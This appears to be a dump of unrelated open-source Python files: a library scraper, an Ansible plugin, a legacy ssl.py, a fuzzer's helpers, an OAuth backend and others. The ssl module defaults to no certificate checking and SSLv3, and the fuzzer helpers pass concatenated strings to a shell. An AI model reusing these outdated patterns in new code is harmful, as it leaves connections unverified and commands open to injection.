('DBS_2', 'http://www.bibliotheksstatistik.de/eingabe/dynrep/adrbrowser/adrbrowser.php?prt=AF111|MB026|GB291|AH259|GC556|KA119|KA129|GD895|AJ367|AF238|AD242|AD072|AG243|GY440|AA186|AB063|AH181|AD369|AC134|AF135|GE231|KS124|AL285|AF196|KQ152|AK116|AG279|AE295|AD217|GD822|AK153|GM675|AG267|AK293|AC286|AB178|AF275|AJ033|AL157|AC122|AJ471|WB861|LD510|GC283|AD059|MB038|AA174|AG371|AG231|LC499|LC505|AJ069|AG073|GB850|WB782|MB014|AH260|AH168|GC301|AJ264|GD998|GE012|GE036|MB002|GD767|AD163|AH351|AC262|GA444|GE462|GB746|AA472|GE899|AH247|AA447|AB270|GE164|GA596|AH284|AF470|AB142|AD229|JA868')]
#
# Functions
#
from bs4 import BeautifulSoup
import urllib2
import json
import csv
def writeDict(bsString):
s = bsString.lstrip() # stripping off leading whitespace
i1 = s.find("(DBS-ID: ")
i2 = i1 + len("(DBS-ID: ")
i3 = s.find(", Sig.") # if there is no Sig. given, i3 returns -1 [i.e. the closing paren ")"]
name = s[:i1-1]
i4 = name.find(' ') # to get the place, split name at first white space
dbsID = s[i2:i3]
place = name[:i4]
dic = {}
dic['DBS-ID'] = dbsID.encode("utf-8") # BeautifulSoup encodes in Unicode,
dic['Name'] = name.encode("utf-8") # which is not supported by csv;
dic['Ort'] = place.encode("utf-8") # hence encoding to utf-8 is necessary
dic['Twitter'] = ''
return dic
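# Worked example (the entry string is an assumption about the DBS print
# page format, in which the place comes first):
#     writeDict(u'Musterstadt Stadtbibliothek (DBS-ID: AB123, Sig.: 99)')
# returns {'DBS-ID': 'AB123', 'Name': 'Musterstadt Stadtbibliothek',
#          'Ort': 'Musterstadt', 'Twitter': ''}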
def findURL(soupTAG):
urlTAG = soupTAG.find_next("a")
url = urlTAG.get('href')
d = {}
d['URL'] = url.encode("utf-8")
return d
def parseHTML(soupHTML):
l = []
loD = []
s0 = soupHTML.table.table.h3
while s0 is not None: # first write each entry which is not None to a list
l.append(s0)
s_next = s0.find_next("h3")
s0 = s_next
for i in l:
url = findURL(i) # finding the next url for each entry
si = i.string # second write each string of the list which is not NoneType
if si is not None: # to a list of dictionaries
di = writeDict(si)
di.update(url) # adding the url to the dict
loD.append(di)
else:
pass
return loD
def libCSV(index_of_urlList):
'''
Pass the index number of urlList as argument.
Prints out:
(1.) the number of (active) libraries in the list,
(2.) a JSON prettyprint list of libraries without a valid URL,
(3.) the name of the csv file.
Saves the csv file in the cwd.
'''
tup = urlList[index_of_urlList]
u = tup[1]
web = urllib2.urlopen(u)
webHTML = web.read()
web.close()
soup = BeautifulSoup(webHTML)
result = parseHTML(soup)
print 'For', tup[0], len(result), '(active) libraries could be found.'
for i in result:
if i["URL"] == "":
print 'For this library no URL could be found: \n'
print json.dumps(i, indent=1), '\n'
filename = tup[0] + '.csv'
l1 = len(filename) + len('The csv will be saved as ')
print "\n"+ l1*"=" + "\n"
print 'The csv will be saved as', filename
return exp2CSV(result, filename)
def exp2CSV(listOfDict, filename):
'''
arguments = list of dictionaries, filename
output = saves file to cwd (current working directory)
'''
outputfile = filename
keyz = listOfDict[0].keys()
f = open(outputfile,'w')
dict_writer = csv.DictWriter(f,keyz)
dict_writer.writer.writerow(keyz)
dict_writer.writerows(listOfDict)
f.close()
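# Minimal command-line entry point; the index 2 (DBS Section 1) is only an
# example -- any valid index of urlList works the same way:
if __name__ == '__main__':
    libCSV(2)   # writes 'DBS_1.csv' to the current working directory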
| mit |
umeboshi2/debops-playbooks | playbooks/lookup_plugins/template_src.py | 6 | 5609 | # (c) 2015, Robert Chady <rchady@sitepen.com>
# Based on `runner/lookup_plugins/file.py` for Ansible
# (c) 2012, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Debops.
# This file is NOT part of Ansible yet.
#
# Debops is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Debops. If not, see <http://www.gnu.org/licenses/>.
'''
This file implements the `template_src` lookup filter for Ansible. Unlike
the `template` filter, it searches for templates along the paths listed in the
`template-paths` variable (colon-separated) as configured in DebOps.
NOTE: This means this filter relies on DebOps.
'''
import os
from debops import *
from debops.cmds import *
__author__ = "Robert Chady <rchady@sitepen.com>"
__copyright__ = "Copyright 2015 by Robert Chady <rchady@sitepen.com>"
__license__ = "GNU General Public LIcense version 3 (GPL v3) or later"
conf_template_paths = 'template-paths'
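# Illustrative .debops.cfg snippet consumed through read_config() below;
# the directory names are assumptions:
#     [paths]
#     template-paths = templates:/opt/shared-templates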
from distutils.version import LooseVersion
from ansible import __version__ as __ansible_version__
class LookupModule(object):
def __new__(class_name, *args, **kwargs):
if LooseVersion(__ansible_version__) < LooseVersion("2.0"):
from ansible import utils, errors
class LookupModuleV1(object):
def __init__(self, basedir, *args, **kwargs):
self.basedir = basedir
def run(self, terms, inject=None, **kwargs):
terms = utils.listify_lookup_plugin_terms(terms, self.basedir, inject)
ret = []
# this can happen if the variable contains a string, strictly not desired for lookup
# plugins, but users may try it, so make it work.
if not isinstance(terms, list):
terms = [ terms ]
project_root = find_debops_project(required=False)
config = read_config(project_root)
places = []
if 'paths' in config and conf_template_paths in config['paths']:
custom_places = config['paths'][conf_template_paths].split(':')
for custom_path in custom_places:
if os.path.isabs(custom_path):
places.append(custom_path)
else:
places.append(os.path.join(project_root, custom_path))
for term in terms:
if '_original_file' in inject:
relative_path = utils.path_dwim_relative(inject['_original_file'], 'templates', '', self.basedir, check=False)
places.append(relative_path)
for path in places:
template = os.path.join(path, term)
if template and os.path.exists(template):
ret.append(template)
break
else:
raise errors.AnsibleError("could not locate file in lookup: %s" % term)
return ret
return LookupModuleV1(*args, **kwargs)
else:
from ansible.errors import AnsibleError
from ansible.plugins.lookup import LookupBase
class LookupModuleV2(LookupBase):
def run(self, terms, variables=None, **kwargs):
ret = []
# this can happen if the variable contains a string, strictly not desired for lookup
# plugins, but users may try it, so make it work.
if not isinstance(terms, list):
terms = [ terms ]
project_root = find_debops_project(required=False)
config = read_config(project_root)
places = []
if 'paths' in config and conf_template_paths in config['paths']:
custom_places = config['paths'][conf_template_paths].split(':')
for custom_path in custom_places:
if os.path.isabs(custom_path):
places.append(custom_path)
else:
places.append(os.path.join(project_root, custom_path))
for term in terms:
if 'role_path' in variables:
relative_path = self._loader.path_dwim_relative(variables['role_path'], 'templates', '')
places.append(relative_path)
for path in places:
template = os.path.join(path, term)
if template and os.path.exists(template):
ret.append(template)
break
else:
raise AnsibleError("could not locate file in lookup: %s" % term)
return ret
return LookupModuleV2(*args, **kwargs)
| gpl-3.0 |
jlnaudin/x-drone | MissionPlanner-master/packages/IronPython.StdLib.2.7.4/content/Lib/ssl.py | 74 | 15611 | # Wrapper module for _ssl, providing some additional facilities
# implemented in Python. Written by Bill Janssen.
"""\
This module provides some more Pythonic support for SSL.
Object types:
SSLSocket -- subtype of socket.socket which does SSL over the socket
Exceptions:
SSLError -- exception raised for I/O errors
Functions:
cert_time_to_seconds -- convert time string used for certificate
notBefore and notAfter functions to integer
seconds past the Epoch (the time values
returned from time.time())
fetch_server_certificate (HOST, PORT) -- fetch the certificate provided
by the server running on HOST at port PORT. No
validation of the certificate is performed.
Integer constants:
SSL_ERROR_ZERO_RETURN
SSL_ERROR_WANT_READ
SSL_ERROR_WANT_WRITE
SSL_ERROR_WANT_X509_LOOKUP
SSL_ERROR_SYSCALL
SSL_ERROR_SSL
SSL_ERROR_WANT_CONNECT
SSL_ERROR_EOF
SSL_ERROR_INVALID_ERROR_CODE
The following group define certificate requirements that one side is
allowing/requiring from the other side:
CERT_NONE - no certificates from the other side are required (or will
be looked at if provided)
CERT_OPTIONAL - certificates are not required, but if provided will be
validated, and if validation fails, the connection will
also fail
CERT_REQUIRED - certificates are required, and will be validated, and
if validation fails, the connection will also fail
The following constants identify various SSL protocol variants:
PROTOCOL_SSLv2
PROTOCOL_SSLv3
PROTOCOL_SSLv23
PROTOCOL_TLSv1
"""
import textwrap
import _ssl # if we can't import it, let the error propagate
from _ssl import OPENSSL_VERSION_NUMBER, OPENSSL_VERSION_INFO, OPENSSL_VERSION
from _ssl import SSLError
from _ssl import CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED
from _ssl import RAND_status, RAND_egd, RAND_add
from _ssl import \
SSL_ERROR_ZERO_RETURN, \
SSL_ERROR_WANT_READ, \
SSL_ERROR_WANT_WRITE, \
SSL_ERROR_WANT_X509_LOOKUP, \
SSL_ERROR_SYSCALL, \
SSL_ERROR_SSL, \
SSL_ERROR_WANT_CONNECT, \
SSL_ERROR_EOF, \
SSL_ERROR_INVALID_ERROR_CODE
from _ssl import PROTOCOL_SSLv3, PROTOCOL_SSLv23, PROTOCOL_TLSv1
_PROTOCOL_NAMES = {
PROTOCOL_TLSv1: "TLSv1",
PROTOCOL_SSLv23: "SSLv23",
PROTOCOL_SSLv3: "SSLv3",
}
try:
from _ssl import PROTOCOL_SSLv2
except ImportError:
pass
else:
_PROTOCOL_NAMES[PROTOCOL_SSLv2] = "SSLv2"
from socket import socket, _fileobject, _delegate_methods, error as socket_error
from socket import getnameinfo as _getnameinfo
import base64 # for DER-to-PEM translation
import errno
class SSLSocket(socket):
"""This class implements a subtype of socket.socket that wraps
the underlying OS socket in an SSL context when necessary, and
provides read and write methods over that channel."""
def __init__(self, sock, keyfile=None, certfile=None,
server_side=False, cert_reqs=CERT_NONE,
ssl_version=PROTOCOL_SSLv23, ca_certs=None,
do_handshake_on_connect=True,
suppress_ragged_eofs=True, ciphers=None):
socket.__init__(self, _sock=sock._sock)
# The initializer for socket overrides the methods send(), recv(), etc.
# in the instance, which we don't need -- but we want to provide the
# methods defined in SSLSocket.
for attr in _delegate_methods:
try:
delattr(self, attr)
except AttributeError:
pass
if certfile and not keyfile:
keyfile = certfile
# see if it's connected
try:
socket.getpeername(self)
except socket_error, e:
if e.errno != errno.ENOTCONN:
raise
# no, no connection yet
self._connected = False
self._sslobj = None
else:
# yes, create the SSL object
self._connected = True
self._sslobj = _ssl.sslwrap(self._sock, server_side,
keyfile, certfile,
cert_reqs, ssl_version, ca_certs,
ciphers)
if do_handshake_on_connect:
self.do_handshake()
self.keyfile = keyfile
self.certfile = certfile
self.cert_reqs = cert_reqs
self.ssl_version = ssl_version
self.ca_certs = ca_certs
self.ciphers = ciphers
self.do_handshake_on_connect = do_handshake_on_connect
self.suppress_ragged_eofs = suppress_ragged_eofs
self._makefile_refs = 0
def read(self, len=1024):
"""Read up to LEN bytes and return them.
Return zero-length string on EOF."""
try:
return self._sslobj.read(len)
except SSLError, x:
if x.args[0] == SSL_ERROR_EOF and self.suppress_ragged_eofs:
return ''
else:
raise
def write(self, data):
"""Write DATA to the underlying SSL channel. Returns
number of bytes of DATA actually transmitted."""
return self._sslobj.write(data)
def getpeercert(self, binary_form=False):
"""Returns a formatted version of the data in the
certificate provided by the other end of the SSL channel.
Return None if no certificate was provided, {} if a
certificate was provided, but not validated."""
return self._sslobj.peer_certificate(binary_form)
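# Possible return shapes (a sketch): None when the peer sent no certificate,
# {} when a certificate was sent but not validated, otherwise a dict of
# decoded fields, e.g.
#   {'subject': ((('commonName', 'example.com'),),),
#    'notAfter': 'May  9 00:00:00 2017 GMT'}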
def cipher(self):
if not self._sslobj:
return None
else:
return self._sslobj.cipher()
def send(self, data, flags=0):
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to send() on %s" %
self.__class__)
while True:
try:
v = self._sslobj.write(data)
except SSLError, x:
if x.args[0] == SSL_ERROR_WANT_READ:
return 0
elif x.args[0] == SSL_ERROR_WANT_WRITE:
return 0
else:
raise
else:
return v
else:
return self._sock.send(data, flags)
def sendto(self, data, flags_or_addr, addr=None):
if self._sslobj:
raise ValueError("sendto not allowed on instances of %s" %
self.__class__)
elif addr is None:
return self._sock.sendto(data, flags_or_addr)
else:
return self._sock.sendto(data, flags_or_addr, addr)
def sendall(self, data, flags=0):
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to sendall() on %s" %
self.__class__)
amount = len(data)
count = 0
while (count < amount):
v = self.send(data[count:])
count += v
return amount
else:
return socket.sendall(self, data, flags)
def recv(self, buflen=1024, flags=0):
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to recv() on %s" %
self.__class__)
return self.read(buflen)
else:
return self._sock.recv(buflen, flags)
def recv_into(self, buffer, nbytes=None, flags=0):
if buffer and (nbytes is None):
nbytes = len(buffer)
elif nbytes is None:
nbytes = 1024
if self._sslobj:
if flags != 0:
raise ValueError(
"non-zero flags not allowed in calls to recv_into() on %s" %
self.__class__)
tmp_buffer = self.read(nbytes)
v = len(tmp_buffer)
buffer[:v] = tmp_buffer
return v
else:
return self._sock.recv_into(buffer, nbytes, flags)
def recvfrom(self, buflen=1024, flags=0):
if self._sslobj:
raise ValueError("recvfrom not allowed on instances of %s" %
self.__class__)
else:
return self._sock.recvfrom(buflen, flags)
def recvfrom_into(self, buffer, nbytes=None, flags=0):
if self._sslobj:
raise ValueError("recvfrom_into not allowed on instances of %s" %
self.__class__)
else:
return self._sock.recvfrom_into(buffer, nbytes, flags)
def pending(self):
if self._sslobj:
return self._sslobj.pending()
else:
return 0
def unwrap(self):
if self._sslobj:
s = self._sslobj.shutdown()
self._sslobj = None
return s
else:
raise ValueError("No SSL wrapper around " + str(self))
def shutdown(self, how):
self._sslobj = None
socket.shutdown(self, how)
def close(self):
if self._makefile_refs < 1:
self._sslobj = None
socket.close(self)
else:
self._makefile_refs -= 1
def do_handshake(self):
"""Perform a TLS/SSL handshake."""
self._sslobj.do_handshake()
def _real_connect(self, addr, return_errno):
# Here we assume that the socket is client-side, and not
# connected at the time of the call. We connect it, then wrap it.
if self._connected:
raise ValueError("attempt to connect already-connected SSLSocket!")
self._sslobj = _ssl.sslwrap(self._sock, False, self.keyfile, self.certfile,
self.cert_reqs, self.ssl_version,
self.ca_certs, self.ciphers)
try:
socket.connect(self, addr)
if self.do_handshake_on_connect:
self.do_handshake()
except socket_error as e:
if return_errno:
return e.errno
else:
self._sslobj = None
raise e
self._connected = True
return 0
def connect(self, addr):
"""Connects to remote ADDR, and then wraps the connection in
an SSL channel."""
self._real_connect(addr, False)
def connect_ex(self, addr):
"""Connects to remote ADDR, and then wraps the connection in
an SSL channel."""
return self._real_connect(addr, True)
def accept(self):
"""Accepts a new connection from a remote client, and returns
a tuple containing that new connection wrapped with a server-side
SSL channel, and the address of the remote client."""
newsock, addr = socket.accept(self)
return (SSLSocket(newsock,
keyfile=self.keyfile,
certfile=self.certfile,
server_side=True,
cert_reqs=self.cert_reqs,
ssl_version=self.ssl_version,
ca_certs=self.ca_certs,
ciphers=self.ciphers,
do_handshake_on_connect=self.do_handshake_on_connect,
suppress_ragged_eofs=self.suppress_ragged_eofs),
addr)
def makefile(self, mode='r', bufsize=-1):
"""Make and return a file-like object that
works with the SSL connection. Just use the code
from the socket module."""
self._makefile_refs += 1
# close=True so as to decrement the reference count when done with
# the file-like object.
return _fileobject(self, mode, bufsize, close=True)
def wrap_socket(sock, keyfile=None, certfile=None,
server_side=False, cert_reqs=CERT_NONE,
ssl_version=PROTOCOL_SSLv23, ca_certs=None,
do_handshake_on_connect=True,
suppress_ragged_eofs=True, ciphers=None):
return SSLSocket(sock, keyfile=keyfile, certfile=certfile,
server_side=server_side, cert_reqs=cert_reqs,
ssl_version=ssl_version, ca_certs=ca_certs,
do_handshake_on_connect=do_handshake_on_connect,
suppress_ragged_eofs=suppress_ragged_eofs,
ciphers=ciphers)
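# Server-side sketch (key and certificate file names are assumptions):
# constructing the listener as an SSLSocket makes accept() hand back
# already-wrapped channels (see SSLSocket.accept above).
#
#   from socket import socket
#   listener = wrap_socket(socket(), server_side=True,
#                          keyfile='server.key', certfile='server.crt')
#   listener.bind(('', 8443))
#   listener.listen(5)
#   conn, addr = listener.accept()   # conn is an SSLSocket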
# some utility functions
def cert_time_to_seconds(cert_time):
"""Takes a date-time string in standard ASN1_print form
("MON DAY 24HOUR:MINUTE:SEC YEAR TIMEZONE") and return
a Python time value in seconds past the epoch."""
import time
return time.mktime(time.strptime(cert_time, "%b %d %H:%M:%S %Y GMT"))
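# Worked example (format per the docstring above):
#
#   cert_time_to_seconds("May  9 00:00:00 2007 GMT")
#
# parses the string with strptime() and converts it with time.mktime().
# Note that mktime() interprets the parsed struct_time in *local* time, so
# the result is shifted by the local UTC offset; the literal "GMT" suffix
# is matched by the pattern but not otherwise honoured.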
PEM_HEADER = "-----BEGIN CERTIFICATE-----"
PEM_FOOTER = "-----END CERTIFICATE-----"
def DER_cert_to_PEM_cert(der_cert_bytes):
"""Takes a certificate in binary DER format and returns the
PEM version of it as a string."""
if hasattr(base64, 'standard_b64encode'):
# preferred because older API gets line-length wrong
f = base64.standard_b64encode(der_cert_bytes)
return (PEM_HEADER + '\n' +
textwrap.fill(f, 64) + '\n' +
PEM_FOOTER + '\n')
else:
return (PEM_HEADER + '\n' +
base64.encodestring(der_cert_bytes) +
PEM_FOOTER + '\n')
def PEM_cert_to_DER_cert(pem_cert_string):
"""Takes a certificate in ASCII PEM format and returns the
DER-encoded version of it as a byte sequence"""
if not pem_cert_string.startswith(PEM_HEADER):
raise ValueError("Invalid PEM encoding; must start with %s"
% PEM_HEADER)
if not pem_cert_string.strip().endswith(PEM_FOOTER):
raise ValueError("Invalid PEM encoding; must end with %s"
% PEM_FOOTER)
d = pem_cert_string.strip()[len(PEM_HEADER):-len(PEM_FOOTER)]
return base64.decodestring(d)
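# The two helpers above are inverses of one another (modulo line wrapping),
# e.g. for a DER blob obtained from getpeercert(True):
#
#   pem = DER_cert_to_PEM_cert(der_bytes)
#   assert PEM_cert_to_DER_cert(pem) == der_bytes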
def get_server_certificate(addr, ssl_version=PROTOCOL_SSLv3, ca_certs=None):
"""Retrieve the certificate from the server at the specified address,
and return it as a PEM-encoded string.
If 'ca_certs' is specified, validate the server cert against it.
If 'ssl_version' is specified, use it in the connection attempt."""
host, port = addr
if (ca_certs is not None):
cert_reqs = CERT_REQUIRED
else:
cert_reqs = CERT_NONE
s = wrap_socket(socket(), ssl_version=ssl_version,
cert_reqs=cert_reqs, ca_certs=ca_certs)
s.connect(addr)
dercert = s.getpeercert(True)
s.close()
return DER_cert_to_PEM_cert(dercert)
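# Usage sketch (host and CA-bundle path are hypothetical):
#
#   pem = get_server_certificate(('example.com', 443))   # fetched, unvalidated
#   pem = get_server_certificate(('example.com', 443),
#                                ca_certs='/path/to/ca-bundle.crt')  # validated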
def get_protocol_name(protocol_code):
return _PROTOCOL_NAMES.get(protocol_code, '<unknown>')
# a replacement for the old socket.ssl function
def sslwrap_simple(sock, keyfile=None, certfile=None):
"""A replacement for the old socket.ssl function. Designed
for compatibility with Python 2.5 and earlier. Will disappear in
Python 3.0."""
if hasattr(sock, "_sock"):
sock = sock._sock
ssl_sock = _ssl.sslwrap(sock, 0, keyfile, certfile, CERT_NONE,
PROTOCOL_SSLv23, None)
try:
sock.getpeername()
except socket_error:
# no, no connection yet
pass
else:
# yes, do the handshake
ssl_sock.do_handshake()
return ssl_sock
| gpl-3.0 |
ohmygodcoin/ohmygodcoin | share/qt/make_spinner.py | 4415 | 1035 | #!/usr/bin/env python
# W.J. van der Laan, 2011
# Make spinning .mng animation from a .png
# Requires imagemagick 6.7+
from __future__ import division
from os import path
from PIL import Image
from subprocess import Popen
SRC='img/reload_scaled.png'
DST='../../src/qt/res/movies/update_spinner.mng'
TMPDIR='/tmp'
TMPNAME='tmp-%03i.png'
NUMFRAMES=35
FRAMERATE=10.0
CONVERT='convert'
CLOCKWISE=True
DSIZE=(16,16)
im_src = Image.open(SRC)
if CLOCKWISE:
im_src = im_src.transpose(Image.FLIP_LEFT_RIGHT)
def frame_to_filename(frame):
return path.join(TMPDIR, TMPNAME % frame)
frame_files = []
for frame in xrange(NUMFRAMES):
rotation = (frame + 0.5) / NUMFRAMES * 360.0
if CLOCKWISE:
rotation = -rotation
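# Worked example: with NUMFRAMES=35, frame 0 rotates by (0.5/35)*360
# ~= 5.14 degrees and frame 34 by ~354.86 degrees (both negated when
# CLOCKWISE), so the frames sample the full circle at evenly spaced
# midpoints rather than starting exactly at 0.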
im_new = im_src.rotate(rotation, Image.BICUBIC)
im_new.thumbnail(DSIZE, Image.ANTIALIAS)
outfile = frame_to_filename(frame)
im_new.save(outfile, 'png')
frame_files.append(outfile)
p = Popen([CONVERT, "-delay", str(FRAMERATE), "-dispose", "2"] + frame_files + [DST])
p.communicate()
| mit |
Android-leak/MFFA | utils.py | 20 | 1048 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
/*
* Android media framework fuzzer
* Copyright (c) 2015, Intel Corporation.
* Author: Alexandru Blanda (ioan-alexandru.blanda@intel.com)
*
* This program is free software; you can redistribute it and/or modify it
* under the terms and conditions of the GNU General Public License,
* version 2, as published by the Free Software Foundation.
*
* This program is distributed in the hope it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*/
"""
from os import listdir
import os
import sys
import subprocess
import re
import time
def run_subproc(cmd):
r = subprocess.Popen([cmd], shell=True)
r.wait()
"""
def subprocess_return(cmd):
r = subprocess.Popen([cmd], shell=True)
r.wait()
"""
def flush_log(device_id):
cmd = 'adb -s ' + str(device_id) + ' logcat -c'
r = subprocess.Popen([cmd], shell=True)
r.wait()
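# Usage sketch (device id is hypothetical): clear the device log before a
# fuzzing run so later captures contain only fresh output, e.g.
#
#   flush_log('emulator-5554')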
| gpl-2.0 |
pyblish/pyblish-win | lib/Python27/Lib/encodings/undefined.py | 860 | 1299 | """ Python 'undefined' Codec
This codec will always raise a UnicodeError (a ValueError subclass) when being
used. It is intended for use by the site.py file to switch off
automatic string to Unicode coercion.
Written by Marc-Andre Lemburg (mal@lemburg.com).
(c) Copyright CNRI, All Rights Reserved. NO WARRANTY.
"""
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
raise UnicodeError("undefined encoding")
def decode(self,input,errors='strict'):
raise UnicodeError("undefined encoding")
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
raise UnicodeError("undefined encoding")
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
raise UnicodeError("undefined encoding")
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='undefined',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamwriter=StreamWriter,
streamreader=StreamReader,
)
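# Usage sketch (illustrative): the codec is looked up through the encodings
# package like any other, but any attempt to use it raises:
#
#   u'abc'.encode('undefined')
#   -> UnicodeError: undefined encoding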
| lgpl-3.0 |
xiaoyaozi5566/DiamondCache | src/arch/alpha/AlphaInterrupts.py | 20 | 1710 | # Copyright (c) 2008 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
from m5.SimObject import SimObject
class AlphaInterrupts(SimObject):
type = 'AlphaInterrupts'
cxx_class = 'AlphaISA::Interrupts'
| bsd-3-clause |
tdicola/pi-facerec-box | train.py | 2 | 3037 | """Raspberry Pi Face Recognition Treasure Box
Face Recognition Training Script
Copyright 2013 Tony DiCola
Run this script to train the face recognition system with positive and negative
training images. The face recognition model is based on the eigen faces
algorithm implemented in OpenCV. You can find more details on the algorithm
and face recognition here:
http://docs.opencv.org/modules/contrib/doc/facerec/facerec_tutorial.html
"""
import fnmatch
import os
import cv2
import numpy as np
import config
import face
MEAN_FILE = 'mean.png'
POSITIVE_EIGENFACE_FILE = 'positive_eigenface.png'
NEGATIVE_EIGENFACE_FILE = 'negative_eigenface.png'
def walk_files(directory, match='*'):
"""Generator function to iterate through all files in a directory recursively
which match the given filename match parameter.
"""
for root, dirs, files in os.walk(directory):
for filename in fnmatch.filter(files, match):
yield os.path.join(root, filename)
def prepare_image(filename):
"""Read an image as grayscale and resize it to the appropriate size for
training the face recognition model.
"""
return face.resize(cv2.imread(filename, cv2.IMREAD_GRAYSCALE))
def normalize(X, low, high, dtype=None):
"""Normalizes a given array in X to a value between low and high.
Adapted from python OpenCV face recognition example at:
https://github.com/Itseez/opencv/blob/2.4/samples/python2/facerec_demo.py
"""
X = np.asarray(X)
minX, maxX = np.min(X), np.max(X)
# normalize to [0...1].
X = X - float(minX)
X = X / float((maxX - minX))
# scale to [low...high].
X = X * (high-low)
X = X + low
if dtype is None:
return np.asarray(X)
return np.asarray(X, dtype=dtype)
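# Worked example: normalize([0, 5, 10], 0, 255) maps the minimum (0) to 0,
# the maximum (10) to 255 and the midpoint (5) to 127.5, since each value x
# becomes (x - min) / (max - min) * (high - low) + low; passing
# dtype=np.uint8 then truncates 127.5 to 127.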
if __name__ == '__main__':
print "Reading training images..."
faces = []
labels = []
pos_count = 0
neg_count = 0
# Read all positive images
for filename in walk_files(config.POSITIVE_DIR, '*.pgm'):
faces.append(prepare_image(filename))
labels.append(config.POSITIVE_LABEL)
pos_count += 1
# Read all negative images
for filename in walk_files(config.NEGATIVE_DIR, '*.pgm'):
faces.append(prepare_image(filename))
labels.append(config.NEGATIVE_LABEL)
neg_count += 1
print 'Read', pos_count, 'positive images and', neg_count, 'negative images.'
# Train model
print 'Training model...'
model = cv2.createEigenFaceRecognizer()
model.train(np.asarray(faces), np.asarray(labels))
# Save model results
model.save(config.TRAINING_FILE)
print 'Training data saved to', config.TRAINING_FILE
# Save mean and eigenface images which summarize the face recognition model.
mean = model.getMat("mean").reshape(faces[0].shape)
cv2.imwrite(MEAN_FILE, normalize(mean, 0, 255, dtype=np.uint8))
eigenvectors = model.getMat("eigenvectors")
pos_eigenvector = eigenvectors[:,0].reshape(faces[0].shape)
cv2.imwrite(POSITIVE_EIGENFACE_FILE, normalize(pos_eigenvector, 0, 255, dtype=np.uint8))
neg_eigenvector = eigenvectors[:,1].reshape(faces[0].shape)
cv2.imwrite(NEGATIVE_EIGENFACE_FILE, normalize(neg_eigenvector, 0, 255, dtype=np.uint8))
| mit |
barseghyanartur/python-social-auth | social/backends/dropbox.py | 83 | 2385 | """
Dropbox OAuth1 backend, docs at:
http://psa.matiasaguirre.net/docs/backends/dropbox.html
"""
from social.backends.oauth import BaseOAuth1, BaseOAuth2
class DropboxOAuth(BaseOAuth1):
"""Dropbox OAuth authentication backend"""
name = 'dropbox'
ID_KEY = 'uid'
AUTHORIZATION_URL = 'https://www.dropbox.com/1/oauth/authorize'
REQUEST_TOKEN_URL = 'https://api.dropbox.com/1/oauth/request_token'
REQUEST_TOKEN_METHOD = 'POST'
ACCESS_TOKEN_URL = 'https://api.dropbox.com/1/oauth/access_token'
ACCESS_TOKEN_METHOD = 'POST'
REDIRECT_URI_PARAMETER_NAME = 'oauth_callback'
EXTRA_DATA = [
('id', 'id'),
('expires', 'expires')
]
def get_user_details(self, response):
"""Return user details from Dropbox account"""
fullname, first_name, last_name = self.get_user_names(
response.get('display_name')
)
return {'username': str(response.get('uid')),
'email': response.get('email'),
'fullname': fullname,
'first_name': first_name,
'last_name': last_name}
def user_data(self, access_token, *args, **kwargs):
"""Loads user data from service"""
return self.get_json('https://api.dropbox.com/1/account/info',
auth=self.oauth_auth(access_token))
class DropboxOAuth2(BaseOAuth2):
name = 'dropbox-oauth2'
ID_KEY = 'uid'
AUTHORIZATION_URL = 'https://www.dropbox.com/1/oauth2/authorize'
ACCESS_TOKEN_URL = 'https://api.dropbox.com/1/oauth2/token'
ACCESS_TOKEN_METHOD = 'POST'
REDIRECT_STATE = False
EXTRA_DATA = [
('uid', 'username'),
]
def get_user_details(self, response):
"""Return user details from Dropbox account"""
fullname, first_name, last_name = self.get_user_names(
response.get('display_name')
)
return {'username': str(response.get('uid')),
'email': response.get('email'),
'fullname': fullname,
'first_name': first_name,
'last_name': last_name}
def user_data(self, access_token, *args, **kwargs):
